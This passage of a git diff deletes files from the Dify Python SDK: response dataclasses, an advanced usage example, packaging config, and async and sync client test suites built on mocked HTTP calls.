None = None - dataset_process_rule_id: str | None = None - batch: str | None = None - position: int | None = None - enabled: bool | None = None - disabled_at: float | None = None - disabled_by: str | None = None - archived: bool | None = None - archived_reason: str | None = None - archived_at: float | None = None - archived_by: str | None = None - word_count: int | None = None - hit_count: int | None = None - doc_form: str | None = None - doc_metadata: Dict[str, Any] | None = None - created_at: float | None = None - updated_at: float | None = None - indexing_status: str | None = None - completed_at: float | None = None - paused_at: float | None = None - error: str | None = None - stopped_at: float | None = None - - -@dataclass -class DocumentSegmentResponse(BaseResponse): - """Document segment response model.""" - - id: str = "" - position: int | None = None - document_id: str | None = None - content: str | None = None - answer: str | None = None - word_count: int | None = None - tokens: int | None = None - keywords: List[str] | None = None - index_node_id: str | None = None - index_node_hash: str | None = None - hit_count: int | None = None - enabled: bool | None = None - disabled_at: float | None = None - disabled_by: str | None = None - status: str | None = None - created_by: str | None = None - created_at: float | None = None - indexing_at: float | None = None - completed_at: float | None = None - error: str | None = None - stopped_at: float | None = None - - -@dataclass -class WorkflowRunResponse(BaseResponse): - """Workflow run response model.""" - - id: str = "" - workflow_id: str | None = None - status: Literal["running", "succeeded", "failed", "stopped"] | None = None - inputs: Dict[str, Any] | None = None - outputs: Dict[str, Any] | None = None - error: str | None = None - elapsed_time: float | None = None - total_tokens: int | None = None - total_steps: int | None = None - created_at: float | None = None - finished_at: float | None = None - - -@dataclass -class ApplicationParametersResponse(BaseResponse): - """Application parameters response model.""" - - opening_statement: str | None = None - 
suggested_questions: List[str] | None = None - speech_to_text: Dict[str, Any] | None = None - text_to_speech: Dict[str, Any] | None = None - retriever_resource: Dict[str, Any] | None = None - sensitive_word_avoidance: Dict[str, Any] | None = None - file_upload: Dict[str, Any] | None = None - system_parameters: Dict[str, Any] | None = None - user_input_form: List[Dict[str, Any]] | None = None - - -@dataclass -class AnnotationResponse(BaseResponse): - """Annotation response model.""" - - id: str = "" - question: str = "" - answer: str = "" - content: str | None = None - created_at: float | None = None - updated_at: float | None = None - created_by: str | None = None - updated_by: str | None = None - hit_count: int | None = None - - -@dataclass -class PaginatedResponse(BaseResponse): - """Paginated response model.""" - - data: List[Any] = field(default_factory=list) - has_more: bool = False - limit: int = 0 - total: int = 0 - page: int | None = None - - -@dataclass -class ConversationVariableResponse(BaseResponse): - """Conversation variable response model.""" - - conversation_id: str = "" - variables: List[Dict[str, Any]] = field(default_factory=list) - - -@dataclass -class FileUploadResponse(BaseResponse): - """File upload response model.""" - - id: str = "" - name: str = "" - size: int = 0 - mime_type: str = "" - url: str | None = None - created_at: float | None = None - - -@dataclass -class AudioResponse(BaseResponse): - """Audio generation/response model.""" - - audio: str | None = None # Base64 encoded audio data or URL - audio_url: str | None = None - duration: float | None = None - sample_rate: int | None = None - - -@dataclass -class SuggestedQuestionsResponse(BaseResponse): - """Suggested questions response model.""" - - message_id: str = "" - questions: List[str] = field(default_factory=list) - - -@dataclass -class AppInfoResponse(BaseResponse): - """App info response model.""" - - id: str = "" - name: str = "" - description: str | None = None - icon: str | None = None - icon_background: str | None = None - mode: str | None = None - tags: List[str] | None = None - enable_site: bool | None = None - enable_api: bool | None = None - api_token: str | None = None - - -@dataclass -class WorkspaceModelsResponse(BaseResponse): - """Workspace models response model.""" - - models: List[Dict[str, Any]] = field(default_factory=list) - - -@dataclass -class HitTestingResponse(BaseResponse): - """Hit testing response model.""" - - query: str = "" - records: List[Dict[str, Any]] = field(default_factory=list) - - -@dataclass -class DatasetTagsResponse(BaseResponse): - """Dataset tags response model.""" - - tags: List[Dict[str, Any]] = field(default_factory=list) - - -@dataclass -class WorkflowLogsResponse(BaseResponse): - """Workflow logs response model.""" - - logs: List[Dict[str, Any]] = field(default_factory=list) - total: int = 0 - page: int = 0 - limit: int = 0 - has_more: bool = False - - -@dataclass -class ModelProviderResponse(BaseResponse): - """Model provider response model.""" - - provider_name: str = "" - provider_type: str = "" - models: List[Dict[str, Any]] = field(default_factory=list) - is_enabled: bool = False - credentials: Dict[str, Any] | None = None - - -@dataclass -class FileInfoResponse(BaseResponse): - """File info response model.""" - - id: str = "" - name: str = "" - size: int = 0 - mime_type: str = "" - url: str | None = None - created_at: int | None = None - metadata: Dict[str, Any] | None = None - - -@dataclass -class WorkflowDraftResponse(BaseResponse): - """Workflow 
draft response model.""" - - id: str = "" - app_id: str = "" - draft_data: Dict[str, Any] = field(default_factory=dict) - version: int = 0 - created_at: int | None = None - updated_at: int | None = None - - -@dataclass -class ApiTokenResponse(BaseResponse): - """API token response model.""" - - id: str = "" - name: str = "" - token: str = "" - description: str | None = None - created_at: int | None = None - last_used_at: int | None = None - is_active: bool = True - - -@dataclass -class JobStatusResponse(BaseResponse): - """Job status response model.""" - - job_id: str = "" - job_status: str = "" - error_msg: str | None = None - progress: float | None = None - created_at: int | None = None - updated_at: int | None = None - - -@dataclass -class DatasetQueryResponse(BaseResponse): - """Dataset query response model.""" - - query: str = "" - records: List[Dict[str, Any]] = field(default_factory=list) - total: int = 0 - search_time: float | None = None - retrieval_model: Dict[str, Any] | None = None - - -@dataclass -class DatasetTemplateResponse(BaseResponse): - """Dataset template response model.""" - - template_name: str = "" - display_name: str = "" - description: str = "" - category: str = "" - icon: str | None = None - config_schema: Dict[str, Any] = field(default_factory=dict) - - -# Type aliases for common response types -ResponseType = Union[ - BaseResponse, - ErrorResponse, - MessageResponse, - ConversationResponse, - DatasetResponse, - DocumentResponse, - DocumentSegmentResponse, - WorkflowRunResponse, - ApplicationParametersResponse, - AnnotationResponse, - PaginatedResponse, - ConversationVariableResponse, - FileUploadResponse, - AudioResponse, - SuggestedQuestionsResponse, - AppInfoResponse, - WorkspaceModelsResponse, - HitTestingResponse, - DatasetTagsResponse, - WorkflowLogsResponse, - ModelProviderResponse, - FileInfoResponse, - WorkflowDraftResponse, - ApiTokenResponse, - JobStatusResponse, - DatasetQueryResponse, - DatasetTemplateResponse, -] diff --git a/sdks/python-client/examples/advanced_usage.py b/sdks/python-client/examples/advanced_usage.py deleted file mode 100644 index bc8720bef2..0000000000 --- a/sdks/python-client/examples/advanced_usage.py +++ /dev/null @@ -1,264 +0,0 @@ -""" -Advanced usage examples for the Dify Python SDK. 
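For reference, the response models removed above are plain dataclasses whose fields all carry defaults, so they stay keyword-constructible from raw API payloads. A minimal sketch of that pattern, using a local stand-in that mirrors the deleted `MessageResponse` (the `parse_message` helper is hypothetical and the inherited `BaseResponse` fields are omitted):

```python
from dataclasses import dataclass, fields
from typing import Any


# Stand-in mirroring the deleted MessageResponse; BaseResponse fields omitted.
@dataclass
class MessageResponse:
    id: str = ""
    answer: str = ""
    conversation_id: str | None = None
    created_at: int | None = None
    metadata: dict[str, Any] | None = None
    files: list[dict[str, Any]] | None = None


def parse_message(payload: dict[str, Any]) -> MessageResponse:
    """Drop unknown keys before constructing, so new API fields don't raise."""
    known = {f.name for f in fields(MessageResponse)}
    return MessageResponse(**{k: v for k, v in payload.items() if k in known})


msg = parse_message({"id": "msg_1", "answer": "Hello!", "event": "message"})
assert msg.answer == "Hello!"
```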
- -This example demonstrates: -- Error handling and retries -- Logging configuration -- Context managers -- Async usage -- File uploads -- Dataset management -""" - -import asyncio -import logging -from pathlib import Path - -from dify_client import ( - ChatClient, - CompletionClient, - AsyncChatClient, - KnowledgeBaseClient, - DifyClient, -) -from dify_client.exceptions import ( - APIError, - RateLimitError, - AuthenticationError, - DifyClientError, -) - - -def setup_logging(): - """Setup logging for the SDK.""" - logging.basicConfig(level=logging.INFO, format="%(asctime)s - %(name)s - %(levelname)s - %(message)s") - - -def example_chat_with_error_handling(): - """Example of chat with comprehensive error handling.""" - api_key = "your-api-key-here" - - try: - with ChatClient(api_key, enable_logging=True) as client: - # Simple chat message - response = client.create_chat_message( - inputs={}, query="Hello, how are you?", user="user-123", response_mode="blocking" - ) - - result = response.json() - print(f"Response: {result.get('answer')}") - - except AuthenticationError as e: - print(f"Authentication failed: {e}") - print("Please check your API key") - - except RateLimitError as e: - print(f"Rate limit exceeded: {e}") - if e.retry_after: - print(f"Retry after {e.retry_after} seconds") - - except APIError as e: - print(f"API error: {e.message}") - print(f"Status code: {e.status_code}") - - except DifyClientError as e: - print(f"Dify client error: {e}") - - except Exception as e: - print(f"Unexpected error: {e}") - - -def example_completion_with_files(): - """Example of completion with file upload.""" - api_key = "your-api-key-here" - - with CompletionClient(api_key) as client: - # Upload an image file first - file_path = "path/to/your/image.jpg" - - try: - with open(file_path, "rb") as f: - files = {"file": (Path(file_path).name, f, "image/jpeg")} - upload_response = client.file_upload("user-123", files) - upload_response.raise_for_status() - - file_id = upload_response.json().get("id") - print(f"File uploaded with ID: {file_id}") - - # Use the uploaded file in completion - files_list = [{"type": "image", "transfer_method": "local_file", "upload_file_id": file_id}] - - completion_response = client.create_completion_message( - inputs={"query": "Describe this image"}, response_mode="blocking", user="user-123", files=files_list - ) - - result = completion_response.json() - print(f"Completion result: {result.get('answer')}") - - except FileNotFoundError: - print(f"File not found: {file_path}") - except Exception as e: - print(f"Error during file upload/completion: {e}") - - -def example_dataset_management(): - """Example of dataset management operations.""" - api_key = "your-api-key-here" - - with KnowledgeBaseClient(api_key) as kb_client: - try: - # Create a new dataset - create_response = kb_client.create_dataset(name="My Test Dataset") - create_response.raise_for_status() - - dataset_id = create_response.json().get("id") - print(f"Created dataset with ID: {dataset_id}") - - # Create a client with the dataset ID - dataset_client = KnowledgeBaseClient(api_key, dataset_id=dataset_id) - - # Add a document by text - doc_response = dataset_client.create_document_by_text( - name="Test Document", text="This is a test document for the knowledge base." 
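The `RateLimitError` branch in this example surfaces `retry_after` but stops at printing it; a retry wrapper is the natural next step. A sketch under the same imports (`chat_with_retry` is illustrative, not part of the SDK):

```python
import time

from dify_client import ChatClient
from dify_client.exceptions import RateLimitError


def chat_with_retry(client: ChatClient, query: str, user: str, max_attempts: int = 3):
    """Retry a blocking chat call when the API signals rate limiting."""
    for attempt in range(max_attempts):
        try:
            return client.create_chat_message(
                inputs={}, query=query, user=user, response_mode="blocking"
            )
        except RateLimitError as e:
            if attempt == max_attempts - 1:
                raise
            # Honor the server's hint when present, otherwise back off exponentially.
            time.sleep(e.retry_after or 2**attempt)
```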
- ) - doc_response.raise_for_status() - - document_id = doc_response.json().get("document", {}).get("id") - print(f"Created document with ID: {document_id}") - - # List documents - list_response = dataset_client.list_documents() - list_response.raise_for_status() - - documents = list_response.json().get("data", []) - print(f"Dataset contains {len(documents)} documents") - - # Update dataset configuration - update_response = dataset_client.update_dataset( - name="Updated Dataset Name", description="Updated description", indexing_technique="high_quality" - ) - update_response.raise_for_status() - - print("Dataset updated successfully") - - except Exception as e: - print(f"Dataset management error: {e}") - - -async def example_async_chat(): - """Example of async chat usage.""" - api_key = "your-api-key-here" - - try: - async with AsyncChatClient(api_key) as client: - # Create chat message - response = await client.create_chat_message( - inputs={}, query="What's the weather like?", user="user-456", response_mode="blocking" - ) - - result = response.json() - print(f"Async response: {result.get('answer')}") - - # Get conversations - conversations = await client.get_conversations("user-456") - conversations.raise_for_status() - - conv_data = conversations.json() - print(f"Found {len(conv_data.get('data', []))} conversations") - - except Exception as e: - print(f"Async chat error: {e}") - - -def example_streaming_response(): - """Example of handling streaming responses.""" - api_key = "your-api-key-here" - - with ChatClient(api_key) as client: - try: - response = client.create_chat_message( - inputs={}, query="Tell me a story", user="user-789", response_mode="streaming" - ) - - print("Streaming response:") - for line in response.iter_lines(decode_unicode=True): - if line.startswith("data:"): - data = line[5:].strip() - if data: - import json - - try: - chunk = json.loads(data) - answer = chunk.get("answer", "") - if answer: - print(answer, end="", flush=True) - except json.JSONDecodeError: - continue - print() # New line after streaming - - except Exception as e: - print(f"Streaming error: {e}") - - -def example_application_info(): - """Example of getting application information.""" - api_key = "your-api-key-here" - - with DifyClient(api_key) as client: - try: - # Get app info - info_response = client.get_app_info() - info_response.raise_for_status() - - app_info = info_response.json() - print(f"App name: {app_info.get('name')}") - print(f"App mode: {app_info.get('mode')}") - print(f"App tags: {app_info.get('tags', [])}") - - # Get app parameters - params_response = client.get_application_parameters("user-123") - params_response.raise_for_status() - - params = params_response.json() - print(f"Opening statement: {params.get('opening_statement')}") - print(f"Suggested questions: {params.get('suggested_questions', [])}") - - except Exception as e: - print(f"App info error: {e}") - - -def main(): - """Run all examples.""" - setup_logging() - - print("=== Dify Python SDK Advanced Usage Examples ===\n") - - print("1. Chat with Error Handling:") - example_chat_with_error_handling() - print() - - print("2. Completion with Files:") - example_completion_with_files() - print() - - print("3. Dataset Management:") - example_dataset_management() - print() - - print("4. Async Chat:") - asyncio.run(example_async_chat()) - print() - - print("5. Streaming Response:") - example_streaming_response() - print() - - print("6. 
Application Info:")
-    example_application_info()
-    print()
-
-    print("All examples completed!")
-
-
-if __name__ == "__main__":
-    main()
diff --git a/sdks/python-client/pyproject.toml b/sdks/python-client/pyproject.toml
deleted file mode 100644
index a25cb9150c..0000000000
--- a/sdks/python-client/pyproject.toml
+++ /dev/null
@@ -1,43 +0,0 @@
-[project]
-name = "dify-client"
-version = "0.1.12"
-description = "A package for interacting with the Dify Service-API"
-readme = "README.md"
-requires-python = ">=3.10"
-dependencies = [
-    "httpx[http2]>=0.27.0",
-    "aiofiles>=23.0.0",
-]
-authors = [
-    {name = "Dify", email = "hello@dify.ai"}
-]
-license = {text = "MIT"}
-keywords = ["dify", "nlp", "ai", "language-processing"]
-classifiers = [
-    "Programming Language :: Python :: 3",
-    "License :: OSI Approved :: MIT License",
-    "Operating System :: OS Independent",
-]
-
-[project.urls]
-Homepage = "https://github.com/langgenius/dify"
-
-[project.optional-dependencies]
-dev = [
-    "pytest>=7.0.0",
-    "pytest-asyncio>=0.21.0",
-]
-
-[build-system]
-requires = ["hatchling"]
-build-backend = "hatchling.build"
-
-[tool.hatch.build.targets.wheel]
-packages = ["dify_client"]
-
-[tool.pytest.ini_options]
-testpaths = ["tests"]
-python_files = ["test_*.py"]
-python_classes = ["Test*"]
-python_functions = ["test_*"]
-asyncio_mode = "auto"
diff --git a/sdks/python-client/tests/test_async_client.py b/sdks/python-client/tests/test_async_client.py
deleted file mode 100644
index 4f5001866f..0000000000
--- a/sdks/python-client/tests/test_async_client.py
+++ /dev/null
@@ -1,250 +0,0 @@
-#!/usr/bin/env python3
-"""
-Test suite for async client implementation in the Python SDK.
-
-This test validates the async/await functionality using httpx.AsyncClient
-and ensures API parity with sync clients.
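The async example above (`example_async_chat`) leans on `AsyncChatClient` as an async context manager, with `aclose()` awaited on exit where the sync client calls `close()`, the one naming difference the parity tests below account for. A condensed sketch of that lifecycle, assuming the constructor mirrors the sync client's:

```python
from dify_client import AsyncChatClient


async def ask(api_key: str, question: str) -> str:
    # aclose() runs automatically when the block exits.
    async with AsyncChatClient(api_key) as client:
        response = await client.create_chat_message(
            inputs={}, query=question, user="user-123", response_mode="blocking"
        )
        return response.json().get("answer", "")


# asyncio.run(ask("your-api-key-here", "Hello?"))
```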
-""" - -import unittest -from unittest.mock import Mock, patch, AsyncMock - -from dify_client.async_client import ( - AsyncDifyClient, - AsyncChatClient, - AsyncCompletionClient, - AsyncWorkflowClient, - AsyncWorkspaceClient, - AsyncKnowledgeBaseClient, -) - - -class TestAsyncAPIParity(unittest.TestCase): - """Test that async clients have API parity with sync clients.""" - - def test_dify_client_api_parity(self): - """Test AsyncDifyClient has same methods as DifyClient.""" - from dify_client import DifyClient - - sync_methods = {name for name in dir(DifyClient) if not name.startswith("_")} - async_methods = {name for name in dir(AsyncDifyClient) if not name.startswith("_")} - - # aclose is async-specific, close is sync-specific - sync_methods.discard("close") - async_methods.discard("aclose") - - # Verify parity - self.assertEqual(sync_methods, async_methods, "API parity mismatch for DifyClient") - - def test_chat_client_api_parity(self): - """Test AsyncChatClient has same methods as ChatClient.""" - from dify_client import ChatClient - - sync_methods = {name for name in dir(ChatClient) if not name.startswith("_")} - async_methods = {name for name in dir(AsyncChatClient) if not name.startswith("_")} - - sync_methods.discard("close") - async_methods.discard("aclose") - - self.assertEqual(sync_methods, async_methods, "API parity mismatch for ChatClient") - - def test_completion_client_api_parity(self): - """Test AsyncCompletionClient has same methods as CompletionClient.""" - from dify_client import CompletionClient - - sync_methods = {name for name in dir(CompletionClient) if not name.startswith("_")} - async_methods = {name for name in dir(AsyncCompletionClient) if not name.startswith("_")} - - sync_methods.discard("close") - async_methods.discard("aclose") - - self.assertEqual(sync_methods, async_methods, "API parity mismatch for CompletionClient") - - def test_workflow_client_api_parity(self): - """Test AsyncWorkflowClient has same methods as WorkflowClient.""" - from dify_client import WorkflowClient - - sync_methods = {name for name in dir(WorkflowClient) if not name.startswith("_")} - async_methods = {name for name in dir(AsyncWorkflowClient) if not name.startswith("_")} - - sync_methods.discard("close") - async_methods.discard("aclose") - - self.assertEqual(sync_methods, async_methods, "API parity mismatch for WorkflowClient") - - def test_workspace_client_api_parity(self): - """Test AsyncWorkspaceClient has same methods as WorkspaceClient.""" - from dify_client import WorkspaceClient - - sync_methods = {name for name in dir(WorkspaceClient) if not name.startswith("_")} - async_methods = {name for name in dir(AsyncWorkspaceClient) if not name.startswith("_")} - - sync_methods.discard("close") - async_methods.discard("aclose") - - self.assertEqual(sync_methods, async_methods, "API parity mismatch for WorkspaceClient") - - def test_knowledge_base_client_api_parity(self): - """Test AsyncKnowledgeBaseClient has same methods as KnowledgeBaseClient.""" - from dify_client import KnowledgeBaseClient - - sync_methods = {name for name in dir(KnowledgeBaseClient) if not name.startswith("_")} - async_methods = {name for name in dir(AsyncKnowledgeBaseClient) if not name.startswith("_")} - - sync_methods.discard("close") - async_methods.discard("aclose") - - self.assertEqual(sync_methods, async_methods, "API parity mismatch for KnowledgeBaseClient") - - -class TestAsyncClientMocked(unittest.IsolatedAsyncioTestCase): - """Test async client with mocked httpx.AsyncClient.""" - - 
@patch("dify_client.async_client.httpx.AsyncClient") - async def test_async_client_initialization(self, mock_httpx_async_client): - """Test async client initializes with httpx.AsyncClient.""" - mock_client_instance = AsyncMock() - mock_httpx_async_client.return_value = mock_client_instance - - client = AsyncDifyClient("test-key", "https://api.dify.ai/v1") - - # Verify httpx.AsyncClient was called - mock_httpx_async_client.assert_called_once() - self.assertEqual(client.api_key, "test-key") - - await client.aclose() - - @patch("dify_client.async_client.httpx.AsyncClient") - async def test_async_context_manager(self, mock_httpx_async_client): - """Test async context manager works.""" - mock_client_instance = AsyncMock() - mock_httpx_async_client.return_value = mock_client_instance - - async with AsyncDifyClient("test-key") as client: - self.assertEqual(client.api_key, "test-key") - - # Verify aclose was called - mock_client_instance.aclose.assert_called_once() - - @patch("dify_client.async_client.httpx.AsyncClient") - async def test_async_send_request(self, mock_httpx_async_client): - """Test async _send_request method.""" - mock_response = AsyncMock() - mock_response.json = AsyncMock(return_value={"result": "success"}) - mock_response.status_code = 200 - - mock_client_instance = AsyncMock() - mock_client_instance.request = AsyncMock(return_value=mock_response) - mock_httpx_async_client.return_value = mock_client_instance - - async with AsyncDifyClient("test-key") as client: - response = await client._send_request("GET", "/test") - - # Verify request was called - mock_client_instance.request.assert_called_once() - call_args = mock_client_instance.request.call_args - - # Verify parameters - self.assertEqual(call_args[0][0], "GET") - self.assertEqual(call_args[0][1], "/test") - - @patch("dify_client.async_client.httpx.AsyncClient") - async def test_async_chat_client(self, mock_httpx_async_client): - """Test AsyncChatClient functionality.""" - mock_response = AsyncMock() - mock_response.text = '{"answer": "Hello!"}' - mock_response.json = AsyncMock(return_value={"answer": "Hello!"}) - - mock_client_instance = AsyncMock() - mock_client_instance.request = AsyncMock(return_value=mock_response) - mock_httpx_async_client.return_value = mock_client_instance - - async with AsyncChatClient("test-key") as client: - response = await client.create_chat_message({}, "Hi", "user123") - self.assertIn("answer", response.text) - - @patch("dify_client.async_client.httpx.AsyncClient") - async def test_async_completion_client(self, mock_httpx_async_client): - """Test AsyncCompletionClient functionality.""" - mock_response = AsyncMock() - mock_response.text = '{"answer": "Response"}' - mock_response.json = AsyncMock(return_value={"answer": "Response"}) - - mock_client_instance = AsyncMock() - mock_client_instance.request = AsyncMock(return_value=mock_response) - mock_httpx_async_client.return_value = mock_client_instance - - async with AsyncCompletionClient("test-key") as client: - response = await client.create_completion_message({"query": "test"}, "blocking", "user123") - self.assertIn("answer", response.text) - - @patch("dify_client.async_client.httpx.AsyncClient") - async def test_async_workflow_client(self, mock_httpx_async_client): - """Test AsyncWorkflowClient functionality.""" - mock_response = AsyncMock() - mock_response.json = AsyncMock(return_value={"result": "success"}) - - mock_client_instance = AsyncMock() - mock_client_instance.request = AsyncMock(return_value=mock_response) - 
mock_httpx_async_client.return_value = mock_client_instance - - async with AsyncWorkflowClient("test-key") as client: - response = await client.run({"input": "test"}, "blocking", "user123") - data = await response.json() - self.assertEqual(data["result"], "success") - - @patch("dify_client.async_client.httpx.AsyncClient") - async def test_async_workspace_client(self, mock_httpx_async_client): - """Test AsyncWorkspaceClient functionality.""" - mock_response = AsyncMock() - mock_response.json = AsyncMock(return_value={"data": []}) - - mock_client_instance = AsyncMock() - mock_client_instance.request = AsyncMock(return_value=mock_response) - mock_httpx_async_client.return_value = mock_client_instance - - async with AsyncWorkspaceClient("test-key") as client: - response = await client.get_available_models("llm") - data = await response.json() - self.assertIn("data", data) - - @patch("dify_client.async_client.httpx.AsyncClient") - async def test_async_knowledge_base_client(self, mock_httpx_async_client): - """Test AsyncKnowledgeBaseClient functionality.""" - mock_response = AsyncMock() - mock_response.json = AsyncMock(return_value={"data": [], "total": 0}) - - mock_client_instance = AsyncMock() - mock_client_instance.request = AsyncMock(return_value=mock_response) - mock_httpx_async_client.return_value = mock_client_instance - - async with AsyncKnowledgeBaseClient("test-key") as client: - response = await client.list_datasets() - data = await response.json() - self.assertIn("data", data) - - @patch("dify_client.async_client.httpx.AsyncClient") - async def test_all_async_client_classes(self, mock_httpx_async_client): - """Test all async client classes work with httpx.AsyncClient.""" - mock_client_instance = AsyncMock() - mock_httpx_async_client.return_value = mock_client_instance - - clients = [ - AsyncDifyClient("key"), - AsyncChatClient("key"), - AsyncCompletionClient("key"), - AsyncWorkflowClient("key"), - AsyncWorkspaceClient("key"), - AsyncKnowledgeBaseClient("key"), - ] - - # Verify httpx.AsyncClient was called for each - self.assertEqual(mock_httpx_async_client.call_count, 6) - - # Clean up - for client in clients: - await client.aclose() - - -if __name__ == "__main__": - unittest.main() diff --git a/sdks/python-client/tests/test_client.py b/sdks/python-client/tests/test_client.py deleted file mode 100644 index b0d2f8ba23..0000000000 --- a/sdks/python-client/tests/test_client.py +++ /dev/null @@ -1,489 +0,0 @@ -import os -import time -import unittest -from unittest.mock import Mock, patch, mock_open - -from dify_client.client import ( - ChatClient, - CompletionClient, - DifyClient, - KnowledgeBaseClient, -) - -API_KEY = os.environ.get("API_KEY") -APP_ID = os.environ.get("APP_ID") -API_BASE_URL = os.environ.get("API_BASE_URL", "https://api.dify.ai/v1") -FILE_PATH_BASE = os.path.dirname(__file__) - - -class TestKnowledgeBaseClient(unittest.TestCase): - def setUp(self): - self.api_key = "test-api-key" - self.base_url = "https://api.dify.ai/v1" - self.knowledge_base_client = KnowledgeBaseClient(self.api_key, base_url=self.base_url) - self.README_FILE_PATH = os.path.abspath(os.path.join(FILE_PATH_BASE, "../README.md")) - self.dataset_id = "test-dataset-id" - self.document_id = "test-document-id" - self.segment_id = "test-segment-id" - self.batch_id = "test-batch-id" - - def _get_dataset_kb_client(self): - return KnowledgeBaseClient(self.api_key, base_url=self.base_url, dataset_id=self.dataset_id) - - @patch("dify_client.client.httpx.Client") - def test_001_create_dataset(self, 
mock_httpx_client): - # Mock the HTTP response - mock_response = Mock() - mock_response.json.return_value = {"id": self.dataset_id, "name": "test_dataset"} - mock_response.status_code = 200 - - mock_client_instance = Mock() - mock_client_instance.request.return_value = mock_response - mock_httpx_client.return_value = mock_client_instance - - # Re-create client with mocked httpx - self.knowledge_base_client = KnowledgeBaseClient(self.api_key, base_url=self.base_url) - - response = self.knowledge_base_client.create_dataset(name="test_dataset") - data = response.json() - self.assertIn("id", data) - self.assertEqual("test_dataset", data["name"]) - - # the following tests require to be executed in order because they use - # the dataset/document/segment ids from the previous test - self._test_002_list_datasets() - self._test_003_create_document_by_text() - self._test_004_update_document_by_text() - self._test_006_update_document_by_file() - self._test_007_list_documents() - self._test_008_delete_document() - self._test_009_create_document_by_file() - self._test_010_add_segments() - self._test_011_query_segments() - self._test_012_update_document_segment() - self._test_013_delete_document_segment() - self._test_014_delete_dataset() - - def _test_002_list_datasets(self): - # Mock the response - using the already mocked client from test_001_create_dataset - mock_response = Mock() - mock_response.json.return_value = {"data": [], "total": 0} - mock_response.status_code = 200 - self.knowledge_base_client._client.request.return_value = mock_response - - response = self.knowledge_base_client.list_datasets() - data = response.json() - self.assertIn("data", data) - self.assertIn("total", data) - - def _test_003_create_document_by_text(self): - client = self._get_dataset_kb_client() - # Mock the response - mock_response = Mock() - mock_response.json.return_value = {"document": {"id": self.document_id}, "batch": self.batch_id} - mock_response.status_code = 200 - client._client.request.return_value = mock_response - - response = client.create_document_by_text("test_document", "test_text") - data = response.json() - self.assertIn("document", data) - - def _test_004_update_document_by_text(self): - client = self._get_dataset_kb_client() - # Mock the response - mock_response = Mock() - mock_response.json.return_value = {"document": {"id": self.document_id}, "batch": self.batch_id} - mock_response.status_code = 200 - client._client.request.return_value = mock_response - - response = client.update_document_by_text(self.document_id, "test_document_updated", "test_text_updated") - data = response.json() - self.assertIn("document", data) - self.assertIn("batch", data) - - def _test_006_update_document_by_file(self): - client = self._get_dataset_kb_client() - # Mock the response - mock_response = Mock() - mock_response.json.return_value = {"document": {"id": self.document_id}, "batch": self.batch_id} - mock_response.status_code = 200 - client._client.request.return_value = mock_response - - response = client.update_document_by_file(self.document_id, self.README_FILE_PATH) - data = response.json() - self.assertIn("document", data) - self.assertIn("batch", data) - - def _test_007_list_documents(self): - client = self._get_dataset_kb_client() - # Mock the response - mock_response = Mock() - mock_response.json.return_value = {"data": []} - mock_response.status_code = 200 - client._client.request.return_value = mock_response - - response = client.list_documents() - data = response.json() - self.assertIn("data", data) - - 
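Each of these chained sub-tests re-wires the same three lines of mock plumbing; a small factory (a sketch, not part of the deleted suite) would keep that in one place:

```python
from unittest.mock import Mock


def make_mock_response(payload=None, status_code=200) -> Mock:
    """Canned httpx-style response, matching the hand-wired mocks above."""
    response = Mock()
    response.status_code = status_code
    if payload is not None:
        response.json.return_value = payload
    return response


# Usage inside a sub-test:
# client._client.request.return_value = make_mock_response({"result": "success"})
```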
def _test_008_delete_document(self): - client = self._get_dataset_kb_client() - # Mock the response - mock_response = Mock() - mock_response.json.return_value = {"result": "success"} - mock_response.status_code = 200 - client._client.request.return_value = mock_response - - response = client.delete_document(self.document_id) - data = response.json() - self.assertIn("result", data) - self.assertEqual("success", data["result"]) - - def _test_009_create_document_by_file(self): - client = self._get_dataset_kb_client() - # Mock the response - mock_response = Mock() - mock_response.json.return_value = {"document": {"id": self.document_id}, "batch": self.batch_id} - mock_response.status_code = 200 - client._client.request.return_value = mock_response - - response = client.create_document_by_file(self.README_FILE_PATH) - data = response.json() - self.assertIn("document", data) - - def _test_010_add_segments(self): - client = self._get_dataset_kb_client() - # Mock the response - mock_response = Mock() - mock_response.json.return_value = {"data": [{"id": self.segment_id, "content": "test text segment 1"}]} - mock_response.status_code = 200 - client._client.request.return_value = mock_response - - response = client.add_segments(self.document_id, [{"content": "test text segment 1"}]) - data = response.json() - self.assertIn("data", data) - self.assertGreater(len(data["data"]), 0) - - def _test_011_query_segments(self): - client = self._get_dataset_kb_client() - # Mock the response - mock_response = Mock() - mock_response.json.return_value = {"data": [{"id": self.segment_id, "content": "test text segment 1"}]} - mock_response.status_code = 200 - client._client.request.return_value = mock_response - - response = client.query_segments(self.document_id) - data = response.json() - self.assertIn("data", data) - self.assertGreater(len(data["data"]), 0) - - def _test_012_update_document_segment(self): - client = self._get_dataset_kb_client() - # Mock the response - mock_response = Mock() - mock_response.json.return_value = {"data": {"id": self.segment_id, "content": "test text segment 1 updated"}} - mock_response.status_code = 200 - client._client.request.return_value = mock_response - - response = client.update_document_segment( - self.document_id, - self.segment_id, - {"content": "test text segment 1 updated"}, - ) - data = response.json() - self.assertIn("data", data) - self.assertEqual("test text segment 1 updated", data["data"]["content"]) - - def _test_013_delete_document_segment(self): - client = self._get_dataset_kb_client() - # Mock the response - mock_response = Mock() - mock_response.json.return_value = {"result": "success"} - mock_response.status_code = 200 - client._client.request.return_value = mock_response - - response = client.delete_document_segment(self.document_id, self.segment_id) - data = response.json() - self.assertIn("result", data) - self.assertEqual("success", data["result"]) - - def _test_014_delete_dataset(self): - client = self._get_dataset_kb_client() - # Mock the response - mock_response = Mock() - mock_response.status_code = 204 - client._client.request.return_value = mock_response - - response = client.delete_dataset() - self.assertEqual(204, response.status_code) - - -class TestChatClient(unittest.TestCase): - @patch("dify_client.client.httpx.Client") - def setUp(self, mock_httpx_client): - self.api_key = "test-api-key" - self.chat_client = ChatClient(self.api_key) - - # Set up default mock response for the client - mock_response = Mock() - mock_response.text = '{"answer": 
